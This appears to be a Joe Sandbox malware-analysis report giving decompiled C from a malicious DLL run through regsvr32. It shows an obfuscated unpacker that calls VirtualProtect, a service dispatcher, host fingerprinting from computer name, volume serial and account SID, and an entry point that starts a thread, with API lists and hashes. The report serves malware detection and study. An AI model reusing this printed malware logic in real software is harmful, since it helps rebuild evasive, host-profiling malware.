						_t273 = _t423 + 0x4350ed; // 0x4350ed
						_t274 = _t423 + 0x43585d; // 0x43585d
						_t357 =  *((intOrPtr*)(_t423 + 0x441044))(_t274, _t273, _t433, _t489);
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) & 0x00000000;
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) | _t489 & 0x00000000 ^ _t357;
						_t492 = _t489;
						_t531 = (_t531 & 0x00000000 | _t428 & 0x00000000 | _a4) +  *((intOrPtr*)(_t492 + 0x14));
						_t358 = memcpy( *((intOrPtr*)(_t492 + 0xc)) +  *(_t423 + 0x4350b0), _t531, _t433 & 0x00000000 |  *_t572);
						_t572 =  &((_t572 - 0xfffffffc)[3]);
						_t428 = 0;
						if( *(_t423 + 0x435944) == 0) {
							_t284 = _t423 + 0x435a21; // 0x435a21
							_t358 =  *((intOrPtr*)(_t423 + 0x441054))(_t284);
							_v12 = _t531;
							 *(_t423 + 0x435944) = 0 ^ _t358;
							_t531 = _v12;
						}
						_pop( *_t289);
						_t489 =  &_a36;
						_t568 = _t568;
						if( *(_t423 + 0x4356c1) == 0) {
							_t358 =  *((intOrPtr*)(_t423 + 0x4410a4))(1);
							_v12 = _t531;
							 *(_t423 + 0x4356c1) = _t358;
							_t531 = _v12;
						}
						_t296 =  &_v8;
						 *_t296 = _v8 - 1;
					} while ( *_t296 != 0);
					if( *(_t423 + 0x435018) == 0) {
						_t358 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x43549a)), 9);
						_push(0);
						 *_t572 = _t489;
						 *(_t423 + 0x435018) = 0 ^ _t358;
					}
					_t500 =  *_t572;
					_t574 = _t572 - 0xfffffffc;
					_v12 = _t454;
					_t457 = _v12;
					_t361 = (_t358 & 0x00000000 ^ _t454 ^ _v12 ^  *(_t500 + 0x28)) +  *(_t423 + 0x4350b0);
					if( *(_t423 + 0x435376) == 0) {
						_t308 = _t423 + 0x435524; // 0x435524
						_t368 =  *((intOrPtr*)(_t423 + 0x44106c))(_t361);
						_v12 = _t531;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) & 0x00000000;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) | _t531 ^ _v12 | _t368;
						_t531 = _v12;
						 *_t317 = _t308;
						_t361 = _t368 & 0x00000000 ^ _v12;
					}
					_v12 = _t500;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) & 0x00000000;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) | _t500 ^ _v12 ^ _t361;
					_t503 = _v12;
					_t535 = _t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0));
					_t364 = _t361;
					if((_t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0))) > 0) {
						if( *(_t423 + 0x43536e) == 0) {
							_t366 =  *((intOrPtr*)(_t423 + 0x441070))(0);
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) & 0x00000000;
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) | _t457 ^  *_t574 | _t366;
							_t457 = _t457;
						}
						_t365 = E001A2C41(_t423, _t428, _t457, _t503, _t535, _t535); // executed
						_t364 = E001A34DA(_t365, _t423, _t428, _t457, _t503, _t535, _t535);
					}
					_pop( *_t333);
					_pop( *_t335);
					return _t364;
				} else {
					if( *(_t423 + 0x435004) == 0) {
						_t380 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x4352fb)),  *((intOrPtr*)(_t423 + 0x4354e6)), _t454, _t428);
						_v12 = _t454;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) & 0x00000000;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) ^ _t454 & 0x00000000 ^ _t380;
						_pop( *_t225);
						_t454 = _v12;
						_pop( *_t227);
						_t428 = _v12 + (_t428 & 0x00000000);
					}
					do {
						asm("movsb");
						_t428 = _t428 - 1;
					} while (_t428 != 0);
					if( *(_t423 + 0x4359f5) == 0) {
						_t230 = _t423 + 0x4356a1; // 0x4356a1
						_t379 =  *((intOrPtr*)(_t423 + 0x441068))(_t230, _t454);
						_v12 = _t531;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) & 0x00000000;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) ^ _t531 - _v12 ^ _t379;
						_t531 = _v12;
						_t454 = _t454 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_t486 = _t486 & 0x00000000 ^ (_t428 -  *_t572 |  *(_t423 + 0x4350b0));
					_t428 = _t428;
					 *((intOrPtr*)(_t423 + 0x4354d2)) = 0x40;
					_t241 = _t423 + 0x4356e5; // 0x4356e5
					_t242 = _t423 + 0x4352b4; // 0x4352b4
					_t374 =  *((intOrPtr*)(_t423 + 0x441044))(_t242, _t241, _t454);
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) & 0x00000000;
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) | _t531 ^  *_t572 ^ _t374;
					_t531 = _t531;
					_t454 =  *_t572;
					_t572 = _t572 - 0xfffffffc;
					_t248 = _t423 + 0x4354d2; // 0x4354d2
					_push(2);
					_push(_t454);
					if( *(_t423 + 0x435010) == 0) {
						_t377 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) & 0x00000000;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) ^ _t531 & 0x00000000 ^ _t377;
						_t531 = _v12;
					}
					VirtualProtect(_t486, ??, ??, ??);
					goto L50;
				}
			}

0x001a242a
0x001a242a
0x001a242a
0x001a242a
0x001a242a
0x001a2437
0x001a2439
0x001a243a
0x001a2441
0x001a2442
0x001a2448
0x001a2450
0x001a2457
0x001a2466
0x001a2469
0x001a2472
0x001a2475
0x001a2475
0x001a247f
0x001a2485
0x001a2486
0x001a248e
0x001a2498
0x001a249e
0x001a24a6
0x001a24ad
0x001a24b3
0x001a24b3
0x001a24bd
0x001a24ca
0x001a24cd
0x001a24d9
0x001a24e0
0x001a24e6
0x001a24e9
0x001a24ec
0x001a24ec
0x001a24f5
0x001a24fc
0x001a2502
0x001a250a
0x001a2518
0x001a251e
0x001a2524
0x001a252b
0x001a2531
0x001a2532
0x001a2535
0x001a253a
0x001a253d
0x001a2547
0x001a2552
0x001a2558
0x001a2560
0x001a2567
0x001a256d
0x001a2572
0x001a2575
0x001a257a
0x001a257d
0x001a257d
0x001a2547
0x001a2580
0x001a2581
0x001a258c
0x001a258e
0x001a2596
0x001a2599
0x001a259f
0x001a25a7
0x001a25ae
0x001a25b4
0x001a25b9
0x001a25bc
0x001a25bc
0x001a25c6
0x001a25d7
0x001a25e3
0x001a25ea
0x001a25f0
0x001a25f1
0x001a25fd
0x001a2604
0x001a260a
0x001a2612
0x001a261b
0x001a2627
0x001a262e
0x001a2634
0x001a2634
0x001a2637
0x001a263a
0x001a263a
0x001a2656
0x001a2659
0x001a265c
0x001a2667
0x001a266a
0x001a266b
0x001a2678
0x001a2687
0x001a268d
0x001a2695
0x001a269c
0x001a26a2
0x001a26ab
0x001a26ae
0x001a26ae
0x001a26b1
0x001a26b2
0x001a26bf
0x001a26c2
0x001a26c8
0x001a26d0
0x001a26d7
0x001a26dd
0x001a26e2
0x001a26e5
0x001a26e5
0x001a26e9
0x001a26ef
0x001a26f7
0x001a26fe
0x001a2704
0x001a2709
0x001a270c
0x001a2716
0x001a2720
0x001a272c
0x001a2733
0x001a2739
0x001a273a
0x001a273d
0x001a273d
0x001a2740
0x001a2741
0x001a274c
0x001a2751
0x001a275c
0x001a2765
0x001a276d
0x001a2774
0x001a277a
0x001a277d
0x001a2780
0x001a2780
0x001a278a
0x001a2797
0x001a279a
0x001a27a6
0x001a27ad
0x001a27b3
0x001a27ba
0x001a27bd
0x001a27bd
0x001a27c0
0x001a27c7
0x001a27cf
0x001a27d8
0x001a27de
0x001a27e6
0x001a27ed
0x001a27f3
0x001a27f3
0x001a27f6
0x001a2803
0x001a2806
0x001a2812
0x001a2819
0x001a281f
0x001a2826
0x001a2829
0x001a2829
0x001a282d
0x001a2830
0x001a2833
0x001a2840
0x001a2850
0x001a2853
0x001a2856
0x001a2856
0x001a285e
0x001a2861
0x001a2861
0x001a2864
0x001a286c
0x001a2870
0x001a2873
0x001a287d
0x001a2887
0x001a288f
0x001a2896
0x001a289c
0x001a289c
0x001a289d
0x001a28a5
0x001a28a7
0x001a28b3
0x001a28ba
0x001a28c0
0x001a28c0
0x001a28c3
0x001a28cb
0x001a28cd
0x001a28ce
0x001a28dd
0x001a28e9
0x001a28ec
0x001a28f3
0x001a28f9
0x001a2901
0x001a2908
0x001a290e
0x001a2913
0x001a2916
0x001a2916
0x001a2923
0x001a2925
0x001a292f
0x001a2931
0x001a2934
0x001a2a43
0x001a2a49
0x001a2a56
0x001a2a58
0x001a2a5e
0x001a2a66
0x001a2a6d
0x001a2a73
0x001a2a73
0x001a2a7f
0x001a2a81
0x001a2a82
0x001a2a8f
0x001a2a90
0x001a2a9c
0x001a2a9e
0x001a2aa2
0x001a2aa9
0x001a2ab0
0x001a2abc
0x001a2ac3
0x001a2ac9
0x001a2ad6
0x001a2ae2
0x001a2ae2
0x001a2ae2
0x001a2aeb
0x001a2aed
0x001a2af4
0x001a2afa
0x001a2b01
0x001a2b07
0x001a2b07
0x001a2b10
0x001a2b1f
0x001a2b21
0x001a2b29
0x001a2b2d
0x001a2b33
0x001a2b3a
0x001a2b40
0x001a2b40
0x001a2b43
0x001a2b43
0x001a2b43
0x001a2b53
0x001a2b5d
0x001a2b63
0x001a2b65
0x001a2b6c
0x001a2b72
0x001a2b75
0x001a2b78
0x001a2b7b
0x001a2b89
0x001a2b8c
0x001a2b99
0x001a2b9c
0x001a2ba3
0x001a2ba9
0x001a2bb1
0x001a2bb8
0x001a2bbe
0x001a2bc7
0x001a2bca
0x001a2bca
0x001a2bcd
0x001a2bd5
0x001a2bdc
0x001a2be2
0x001a2bf2
0x001a2bf4
0x001a2bf8
0x001a2c01
0x001a2c05
0x001a2c11
0x001a2c18
0x001a2c1e
0x001a2c1e
0x001a2c20
0x001a2c26
0x001a2c26
0x001a2c2b
0x001a2c37
0x001a2c3e
0x001a293a
0x001a2941
0x001a2951
0x001a2957
0x001a295f
0x001a2966
0x001a296f
0x001a2972
0x001a297b
0x001a297e
0x001a297e
0x001a2981
0x001a2981
0x001a2982
0x001a2982
0x001a298c
0x001a298f
0x001a2996
0x001a299c
0x001a29a4
0x001a29ab
0x001a29b1
0x001a29ba
0x001a29bd
0x001a29bd
0x001a29cd
0x001a29cf
0x001a29d0
0x001a29db
0x001a29e2
0x001a29e9
0x001a29f5
0x001a29fc
0x001a2a02
0x001a2a05
0x001a2a08
0x001a2a0b
0x001a2a12
0x001a2a14
0x001a2a1c
0x001a2a1e
0x001a2a24
0x001a2a2c
0x001a2a33
0x001a2a39
0x001a2a39
0x001a2a3d
0x00000000
0x001a2a3d

APIs

VirtualProtect.KERNEL32(00000000,00000000,00000002,004354D2), ref: 001A2A3D

Memory Dump Source

Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
Instruction ID: 5aaffcebf35a454bf7c3ccf8cf6fb5ef4a2a11b698d653ca4f40d34c6686ccc5
Opcode Fuzzy Hash: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
Instruction Fuzzy Hash: 4E425C72810604EFFF00DFA4C98979A7BB5FF54325F1851AADC0DAE049C77856A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 100030B7, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100030B7() {
				int _t3;
				struct _SERVICE_TABLE_ENTRY* _t6;
				int* _t11;
				intOrPtr _t12;

				_t3 = E10008604(0x10);
				 *0x1001e71c = _t3;
				if(_t3 == 0) {
					L4:
					return _t3 | 0xffffffff;
				} else {
					_t3 = E10008604(0xa);
					_t11 =  *0x1001e71c; // 0x18436e0
					 *_t11 = _t3;
					if(_t3 == 0) {
						goto L4;
					} else {
						_t12 =  *0x1001e688; // 0x1820590
						E1000902D(1, _t3, 7, 8, _t12 + 0x648);
						_t6 =  *0x1001e71c; // 0x18436e0
						 *((intOrPtr*)(_t6 + 4)) = E10003052;
						_t3 = StartServiceCtrlDispatcherA(_t6);
						if(_t3 == 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x100030b9
0x100030be
0x100030c6
0x10003119
0x1000311c
0x100030c8
0x100030ca
0x100030d0
0x100030d6
0x100030da
0x00000000
0x100030dc
0x100030dc
0x100030f2
0x100030f7
0x100030ff
0x1000310c
0x10003114
0x00000000
0x10003116
0x10003118
0x10003118
0x10003114
0x100030da

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

StartServiceCtrlDispatcherA.ADVAPI32(018436E0), ref: 1000310C

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocCtrlDispatcherHeapServiceStart
String ID:
API String ID: 3270895466-0
Opcode ID: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
Instruction ID: ac16b269da70e1785f3d8de3b20eaf3184fc588054e4d94b314cf4149a8ccc23
Opcode Fuzzy Hash: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
Instruction Fuzzy Hash: 59F03AB42443428BF748CB74DC92B5A3398EB44394F55C128E615CB2D5EE75D8128A14

Uniqueness

Uniqueness Score: -1.00%

Function 1000D01F, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x189faa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x189fbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x189faa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x189faa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x189faa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x189faa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x189faa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x189faa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x189faa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x189faa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x189faa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x189faa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetCurrentProcessId.KERNEL32 ref: 1000D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
GetCurrentProcess.KERNEL32 ref: 1000D09F
LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
GetLastError.KERNEL32 ref: 1000D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
GetLastError.KERNEL32 ref: 1000D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
GetCurrentProcess.KERNEL32 ref: 1000D20E
memset.MSVCRT ref: 1000D229
GetVersionExA.KERNEL32(00000000), ref: 1000D234
GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
GetSystemInfo.KERNEL32(?), ref: 1000D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287

Strings

USERPROFILE, xrefs: 1000D2E4, 1000D312
TEMP, xrefs: 1000D328, 1000D333, 1000D344
%s\%s, xrefs: 1000D2F9
TEMP, xrefs: 1000D2F3
SystemDrive, xrefs: 1000D353, 1000D35E, 1000D373

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharDirectoryHeapInfoLookupMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 1775177207-2706916422
Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
SetLastError.KERNEL32(000000AA), ref: 100060D7

Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
GetLastError.KERNEL32 ref: 10005FEF
memset.MSVCRT ref: 10006013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
GetFileAttributesW.KERNEL32(00000000), ref: 10006083
CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7

Strings

Hello qqq, xrefs: 10005F8D

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 3435743081-3610097158
Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}

APIs

memset.MSVCRT ref: 1000B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
